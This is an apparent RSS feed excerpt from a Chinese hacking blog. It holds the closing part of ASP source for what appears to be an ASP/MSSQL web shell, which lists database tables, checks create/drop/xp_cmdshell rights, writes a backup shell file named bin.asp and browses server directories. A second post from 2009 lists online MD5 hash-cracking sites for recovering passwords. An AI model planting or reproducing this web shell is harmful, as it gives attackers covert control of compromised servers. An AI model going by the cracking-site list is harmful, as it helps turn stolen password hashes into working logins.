For Each objTable In Cat.Tables<br />
Echo &#8220;&lt;span class=fixSpan title=&#8217;&#8221; &amp; objTable.Name &amp; &#8220;&#8216; &#8221;<br />
Echo &#8220;style=&#8217;width:90%;padding-left:8px;cursor:hand;&#8217;&gt;&#8221; &amp; objTable.Name &amp; &#8220;&lt;/span&gt;&#8221;<br />
Next<br />
Echo &#8220;&lt;/td&gt;&#8221;<br />
Echo &#8220;&lt;td valign=top&gt;&#8221;<br />
Echo &#8220;&lt;table&gt;&#8221;<br />
Echo &#8220;&lt;tr class=td&gt;&#8221;<br />
Echo &#8220;&lt;td width=&#8217;103&#8242;&gt; 操作检测&lt;/td&gt;&#8221;<br />
Echo &#8220;&lt;td width=&#8217;700&#8242;&gt; &#8220;&amp;cbase&amp;&#8221; &#8220;&amp;create&amp;&#8221; &#8220;&amp;drop&amp;&#8221; &#8220;&amp;xp&amp;&#8221;&lt;/td&gt;&#8221;<br />
Echo &#8220;&lt;/tr&gt;&#8221;<br />
Echo &#8220;&lt;/table&gt;&#8221;<br />
Echo &#8220;&lt;table&gt;&#8221;<br />
Echo &#8220;&lt;tr class=td&gt;&#8221;<br />
Echo &#8220;&lt;td width=&#8217;115&#8242;&gt; 备份SHELL&lt;/td&gt;&#8221;<br />
Echo &#8220;&lt;form method=post name=formt action=&#8217;?action=dir&#8217;&gt;&#8221;<br />
Echo &#8220;&lt;td width=&#8217;700&#8242;&gt; &lt;INPUT TYPE=text NAME=bak size=70 value=&#8217;&#8221;&amp;dir_path&amp;&#8221;bin.asp&#8217;&gt; &lt;INPUT TYPE=submit value=备份&gt;&lt;/td&gt;&lt;/form&gt;&#8221;<br />
Echo &#8220;&lt;/tr&gt;&#8221;<br />
Echo &#8220;&lt;/table&gt;&#8221;<br />
Echo &#8220;&lt;table&gt;&#8221;<br />
Echo &#8220;&lt;tr class=td&gt;&#8221;<br />
Echo &#8220;&lt;td width=&#8217;121&#8242;&gt; 列目录&lt;/td&gt;&#8221;<br />
Echo &#8220;&lt;form method=post name=form2 action=&#8217;?action=dir&#8217;&gt;&#8221;<br />
Echo &#8220;&lt;td width=&#8217;700&#8242;&gt; &lt;INPUT TYPE=text NAME=path size=70 value=&#8217;&#8221;&amp;dir_path&amp;&#8221;&#8216;&gt; &lt;INPUT TYPE=submit value=查询&gt;&lt;input type = button value=退出 onclick= location.href(&#8216;?action=logout&#8217;)&gt;&lt;/td&gt;&lt;/form&gt;&#8221;<br />
Echo &#8220;&lt;/tr&gt;&#8221;<br />
Echo &#8220;&lt;/table&gt;&#8221;<br />
Echo &#8220;&lt;table&gt;&#8221;</p>
<p>showdata()</p>
<p>Echo &#8220;&lt;/table&gt;&#8221;<br />
Echo &#8220;&lt;/td&gt;&#8221;<br />
Echo &#8220;&lt;/tr&gt;&#8221;<br />
Echo &#8220;&lt;/table&gt;&#8221;<br />
Echo &#8220;&lt;p&gt;&#8221;<br />
Echo &#8220;&lt;center&gt;&#8221;?right&amp;&#8221;&lt;/center&gt;&#8221;<br />
End If<br />
End If<br />
%&gt;<br />
&lt;% If Request(&#8220;action&#8221;)=&#8221;logout&#8221; Then<br />
Session(&#8220;login&#8221;) = &#8220;&#8221;<br />
Response.Redirect&#8221;?action=login&#8221;<br />
end if<br />
%&gt;</p>
<p class="akst_link"><a href="http://www.p9.net.cn/?p=1156&amp;akst_action=share-this"  title="可以通过E-mail分享, 用del.icio.us、Google等网络书签收藏！" id="akst_link_1156" class="akst_share_link" rel="nofollow">收藏、分享这篇文章!</a>
</p>]]></content:encoded>
			<wfw:commentRss>http://www.p9.net.cn/sec/asp-mssql.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>md5破解收费了咋办</title>
		<link>http://www.p9.net.cn/sec/md5-crack.html</link>
		<comments>http://www.p9.net.cn/sec/md5-crack.html#comments</comments>
		<pubDate>Mon, 06 Apr 2009 01:06:52 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Network security crack]]></category>
		<category><![CDATA[黑客]]></category>

		<guid isPermaLink="false">http://www.p9.net.cn/?p=1149</guid>
		<description><![CDATA[md5破解站www.cmd5.com收费有一段时间了,它是黑客比较喜欢的md5破解站,以前我也挺喜欢cmd5的可惜它收费了.有时候密码破解出来,却提示你要付费才能获得,每次付费5毛钱.不得已我转到了www.xmd5.com这个站我也搞不清楚是国人办的还是外国人办的,它目前是除了cmd5以外数据量最大的一家md5破解站,希望xmd5不要像cmd5那样也收费了,不然以后只能靠手工破解了.另外还有几家md5破解站我就也顺便把网址给大家吧http://md5.mmkey.com/  http://gdataonline.com/seekhash.php
http://www.hashchecker.com/?_sls=search_hash
http://md5.rednoize.com/
最后一个比较特殊它是在线暴露破解的http://www.milw0rm.com/md5/info.php
收藏、分享这篇文章!
]]></description>
			<content:encoded><![CDATA[<p>md5破解站<a href="http://www.cmd5.com">www.cmd5.com</a>收费有一段时间了,它是黑客比较喜欢的md5破解站,以前我也挺喜欢cmd5的可惜它收费了.有时候密码破解出来,却提示你要付费才能获得,每次付费5毛钱.不得已我转到了<a href="http://www.xmd5.com">www.xmd5.com</a>这个站我也搞不清楚是国人办的还是外国人办的,它目前是除了cmd5以外数据量最大的一家md5破解站,希望xmd5不要像cmd5那样也收费了,不然以后只能靠手工破解了.另外还有几家md5破解站我就也顺便把网址给大家吧<a href="http://md5.mmkey.com/">http://md5.mmkey.com/</a>  <a href="http://gdataonline.com/seekhash.php">http://gdataonline.com/seekhash.php</a></p>
<p><a href="http://www.hashchecker.com/?_sls=search_hash">http://www.hashchecker.com/?_sls=search_hash</a></p>
<p><a href="http://md5.rednoize.com/">http://md5.rednoize.com/</a></p>
<p>最后一个比较特殊它是在线暴露破解的<a href="http://www.milw0rm.com/md5/info.php">http://www.milw0rm.com/md5/info.php</a></p>
<p class="akst_link"><a href="http://www.p9.net.cn/?p=1149&amp;akst_action=share-this"  title="可以通过E-mail分享, 用del.icio.us、Google等网络书签收藏！" id="akst_link_1149" class="akst_share_link" rel="nofollow">收藏、分享这篇文章!</a>
</p>]]></content:encoded>
			<wfw:commentRss>http://www.p9.net.cn/sec/md5-crack.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
